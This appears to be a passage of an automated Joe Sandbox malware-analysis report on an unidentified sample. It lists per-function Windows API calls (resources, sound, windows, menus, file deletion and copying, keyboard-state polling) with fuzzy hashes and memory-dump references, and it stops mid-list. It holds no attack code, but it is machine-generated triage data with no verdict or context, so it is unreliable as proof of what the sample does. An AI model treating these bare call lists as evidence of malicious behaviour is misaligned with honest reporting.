                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                        • Opcode ID: b2df82e92e0240b53ce3523649f670cb193c4e44c6045103f6b7eddd47953c23
                                                                                                                        • Instruction ID: 869e41fd28d20fa2cd460350c749d1ba714cd855d2745bc812025e197e50c1e3
                                                                                                                        • Opcode Fuzzy Hash: b2df82e92e0240b53ce3523649f670cb193c4e44c6045103f6b7eddd47953c23
                                                                                                                        • Instruction Fuzzy Hash: 6441E37681022DAACF11EBA4EC85DEEB779EF18714F44416AF911B3160EB719E04CFA0
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00DD7226
                                                                                                                        • __swprintf.LIBCMT ref: 00DD7233
                                                                                                                          • Part of subcall function 00DB234B: __woutput_l.LIBCMT ref: 00DB23A4
                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00DD725D
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00DD7269
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00DD7276
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00DD7296
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00DD72A8
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00DD72B7
                                                                                                                        • LockResource.KERNEL32(?), ref: 00DD72C3
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00DD7322
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                        • String ID: L6
                                                                                                                        • API String ID: 1433390588-4199682035
                                                                                                                        • Opcode ID: fe6b3287a2941a286fe10bf228656f8cf24834886b7fa15f746870c02459c6cf
                                                                                                                        • Instruction ID: 0294090bbe4e2773daf05b5b8f279f7381a609a8e2e0966a4a56d3900965760b
                                                                                                                        • Opcode Fuzzy Hash: fe6b3287a2941a286fe10bf228656f8cf24834886b7fa15f746870c02459c6cf
                                                                                                                        • Instruction Fuzzy Hash: 8D318E7190825AAFDB019F62DC45AEF7BA9FF04341B048456FD22E2260E734D954DAB4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DD843F
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DD8455
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD8466
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DD8478
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DD8489
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_memmove
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                        • Opcode ID: 9ccb58e1ee947a875d02e7c112f4ce6c900422329aec8e8ff1e05ffdc83d5950
                                                                                                                        • Instruction ID: 9880468962524f9f7915452e998150f3481ec396b6ed64729f74734f1ccc3d55
                                                                                                                        • Opcode Fuzzy Hash: 9ccb58e1ee947a875d02e7c112f4ce6c900422329aec8e8ff1e05ffdc83d5950
                                                                                                                        • Instruction Fuzzy Hash: 6C11A761A5025D79DB25A7B1EC4ADFFBB7CEBD5B00F44042AB411B21D1DEA05E44C6B0
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 00DD809C
                                                                                                                          • Part of subcall function 00DAE3A5: timeGetTime.WINMM(?,76C1B400,00E06163), ref: 00DAE3A9
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00DD80C8
                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00DD80EC
                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00DD810E
                                                                                                                        • SetActiveWindow.USER32 ref: 00DD812D
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DD813B
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DD815A
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00DD8165
                                                                                                                        • IsWindow.USER32 ref: 00DD8171
                                                                                                                        • EndDialog.USER32(00000000), ref: 00DD8182
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: BUTTON
                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                        • Opcode ID: f20ec1d878e62eaf308cd7ed0d53c4bf81beadc21bfac37d301ead4c8665fcce
                                                                                                                        • Instruction ID: 42610f57ef81f8ad89efb873c3ac410332d036a939b8197073a75cd68069dd24
                                                                                                                        • Opcode Fuzzy Hash: f20ec1d878e62eaf308cd7ed0d53c4bf81beadc21bfac37d301ead4c8665fcce
                                                                                                                        • Instruction Fuzzy Hash: EA216FB0244305BFE7275F73EC89A763B6AF71438AB084516F521A2361CF728D0DAA71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DDC6A0: __time64.LIBCMT ref: 00DDC6AA
                                                                                                                          • Part of subcall function 00D941A7: _fseek.LIBCMT ref: 00D941BF
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DDC96F
                                                                                                                          • Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD
                                                                                                                        • _wcscpy.LIBCMT ref: 00DDC982
                                                                                                                        • _wcscat.LIBCMT ref: 00DDC995
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DDC9BA
                                                                                                                        • _wcscat.LIBCMT ref: 00DDC9D0
                                                                                                                        • _wcscat.LIBCMT ref: 00DDC9E3
                                                                                                                          • Part of subcall function 00DDC6E4: _memmove.LIBCMT ref: 00DDC71D
                                                                                                                          • Part of subcall function 00DDC6E4: _memmove.LIBCMT ref: 00DDC72C
                                                                                                                        • _wcscmp.LIBCMT ref: 00DDC92A
                                                                                                                          • Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF49
                                                                                                                          • Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF5C
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DDCB8D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DDCC24
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DDCC3A
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DDCC4B
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DDCC5D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 152968663-0
                                                                                                                        • Opcode ID: f07f84258b14601a7e472052c4828ad8d1583a2852b476049510d3b1395734f2
                                                                                                                        • Instruction ID: f6cc37ec50f344013ad0193086f928e30a9f199a86f116ab150fe68ce22bbe78
                                                                                                                        • Opcode Fuzzy Hash: f07f84258b14601a7e472052c4828ad8d1583a2852b476049510d3b1395734f2
                                                                                                                        • Instruction Fuzzy Hash: F5C11CB1910229AEDF10DFA5CC81EEEB7BDEF59310F0040AAB609E6251D7709A85CF75
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3566271842-0
                                                                                                                        • Opcode ID: c87e7d39e06004a137350b97f7a2912a5a6c4d5a2f0848e8cb4aff4c15f8ae1d
                                                                                                                        • Instruction ID: 2776e095290fe34b5c4cfdb00f8c857afd55e9f93d023709651a1d906f30ffc4
                                                                                                                        • Opcode Fuzzy Hash: c87e7d39e06004a137350b97f7a2912a5a6c4d5a2f0848e8cb4aff4c15f8ae1d
                                                                                                                        • Instruction Fuzzy Hash: 09712F75900219EFDB14EFA5C884ADEBBB9FF48310F048096E919AB251D770EE40CFA0
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00DD3908
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00DD3973
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00DD3993
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00DD39AA
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00DD39D9
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00DD39EA
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00DD3A16
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00DD3A24
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00DD3A4D
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00DD3A5B
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00DD3A84
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00DD3A92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 44a49bfc8b1e53c4730d31acf353e659cf227056516cc89beb5e5469ecfd161d
                                                                                                                        • Instruction ID: 9d656d4fd52eda1a4026b7bbcc489b44d67df240f1f3eec8a014f524d3e11f83
                                                                                                                        • Opcode Fuzzy Hash: 44a49bfc8b1e53c4730d31acf353e659cf227056516cc89beb5e5469ecfd161d
                                                                                                                        • Instruction Fuzzy Hash: 7E518821A0478469FB35EBA488117EABFB49F01740F0C859FD5C2563C2DAA49B8CD777
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00DCFB19
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DCFB2B
                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00DCFB89
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00DCFB94
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DCFBA6
                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00DCFBFC
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00DCFC0A
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DCFC1B
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00DCFC5E
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00DCFC6C
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DCFC89
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00DCFC96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3096461208-0
                                                                                                                        • Opcode ID: bf9a734a43b82119ca826c0171d928476421c2b6502bd3ebe17ad948a4d29bcc
                                                                                                                        • Instruction ID: c1c360d4142efb242fe8b9679e4b110cb211da1d32c574e515cd9f94c6973dbc
                                                                                                                        • Opcode Fuzzy Hash: bf9a734a43b82119ca826c0171d928476421c2b6502bd3ebe17ad948a4d29bcc
                                                                                                                        • Instruction Fuzzy Hash: 8251FF71B00209AFDB18CF69DD95FAEBBBAEB88710F14852DB916E7290D7709D048B10
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00DAB067
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: 8d431f572795119e9df40af0ad8419879f0e90fa0450462fdef2680d648619c2
                                                                                                                        • Instruction ID: 3bdc8e3f7e31ca0b6b3af1b1b5ddf22e9f6560b4bcca6820076d60e996df8c2d
                                                                                                                        • Opcode Fuzzy Hash: 8d431f572795119e9df40af0ad8419879f0e90fa0450462fdef2680d648619c2
                                                                                                                        • Instruction Fuzzy Hash: 3E419031105540AFDB245F38DC48BBA3B66EB07731F184266FDA59A2E2D7318C46DB35
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 136442275-0
                                                                                                                        • Opcode ID: 2c59379ba75a40b2b113dd501efad70b5c129fef3bd2566ba3a7c03ea9f621da
                                                                                                                        • Instruction ID: 5f16ebf2efcc01352a976d767d89aa842ed8dc83ba1f8696e52b95c913e9cef1
                                                                                                                        • Opcode Fuzzy Hash: 2c59379ba75a40b2b113dd501efad70b5c129fef3bd2566ba3a7c03ea9f621da
                                                                                                                        • Instruction Fuzzy Hash: 4841D8B690426CAADF21EB50CC55EDE73BCEB08710F5041E6F519A2151EA71ABD48FB0
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00D984E5
                                                                                                                        • __itow.LIBCMT ref: 00D98519
                                                                                                                          • Part of subcall function 00DB2177: _xtow@16.LIBCMT ref: 00DB2198
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                        • Opcode ID: 750974ee2fa5a7c59c2c5d45f543e02b9aaed09631d0f2f460e435391117fdbe
                                                                                                                        • Instruction ID: 0997b42419728a7980401bf8eded4177b9846b23ec4efbf46da26df776a5991f
                                                                                                                        • Opcode Fuzzy Hash: 750974ee2fa5a7c59c2c5d45f543e02b9aaed09631d0f2f460e435391117fdbe
                                                                                                                        • Instruction Fuzzy Hash: 4441C172600705DBDF24DB38DC41AAA77E9EF45710F20446EE58AE7292EA31DA81DB30
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DB5CCA
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00DB5D63
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00DB5D99
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00DB5DB6
                                                                                                                        • __allrem.LIBCMT ref: 00DB5E0C
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E28
                                                                                                                        • __allrem.LIBCMT ref: 00DB5E3F
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E5D
                                                                                                                        • __allrem.LIBCMT ref: 00DB5E74
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5E92
                                                                                                                        • __invoke_watson.LIBCMT ref: 00DB5F03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 384356119-0
                                                                                                                        • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                        • Instruction ID: 42d8d945d267367e7c425bcafd397c2074460a29e26f69528dcd43f9973055f5
                                                                                                                        • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                        • Instruction Fuzzy Hash: 4471FA71A01B17EBDB14AF78DC81BEAB7A9EF00324F144229F415D7685E770DA408BB0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DD5816
                                                                                                                        • GetMenuItemInfoW.USER32(00E518F0,000000FF,00000000,00000030), ref: 00DD5877
                                                                                                                        • SetMenuItemInfoW.USER32(00E518F0,00000004,00000000,00000030), ref: 00DD58AD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00DD58BF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00DD5903
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00DD591F
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00DD5949
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00DD598E
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DD59D4
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD59E8
                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD5A09
